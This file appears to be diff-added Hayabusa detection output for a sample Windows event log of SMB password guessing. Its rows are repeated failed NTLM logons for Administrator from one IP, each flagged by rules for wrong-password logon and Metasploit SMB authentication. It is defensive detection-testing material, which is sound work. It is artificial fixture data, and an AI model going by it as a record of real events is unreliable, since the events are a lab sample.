+2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5OqvximSAPlXZ3An  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tr2GQ1F3jccpWrsm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CCmbvQXXXzhHOdMG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qTp1BwPv8XiK2mrG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rnb19AXxM5ArcLxX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EUS5CKq2W1rkq46d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FzKSUVdsC5eENWDd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QFL07Mhy4iw5psBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cMpitnzLXDLSXL73  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RSfaPdcsiRQoGYYm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PJRP4bS9Qgg06Z5P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3Z4veMNKngHUDoRf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmF0YFgAMSRotb1y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DmrbO3dZw46DgmZQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qg4CMwLpfzLrvDPj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BKDKUXNNhuSqRiTE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cBocrjNXjmuPCKRJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: loCrAXibgVxcOtCM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZ7pHOJeOExrON2E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MeucKpaodpmdsqhD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LRlmBeBlV6n4MQyo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E8FYOF6HxJHqm7GW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9tBtz1GYn5J8sbFH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qn8PlxEzIu9AKUgt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdjqlNDU3U150UAw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esaTfuwuiFAkIVs6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y4LbVQ5ytgVCqFmL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rWoX76sgYTVwxkD5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQFJRRYn6sjYK5cD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wyVuBGEFGJqImQ7W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pRvnyVGxG8i0e3PQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X6Hv2fj43a8j1O2P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: myP4zVFyw2qE1SV7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lpmBcVilH72dYF7E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Jd9hKGDxLcnZphlL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5OmXgOD9kaGJ4PIA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BpQtWW0fAEzNH28B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EgNkY8LKSWcnLM00  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z8S1dUwb3HjOnEs9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 49ZKcnswdISJDwbS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qOuYmww71pTM0l3t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PUHoGgmXKRJknRZG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6yf8LSkcwBP9s1mN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JmH2AMDmkZVbCt8b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I23o9EQLpPpn9RlY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MrEVj3DB1prpOtnq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
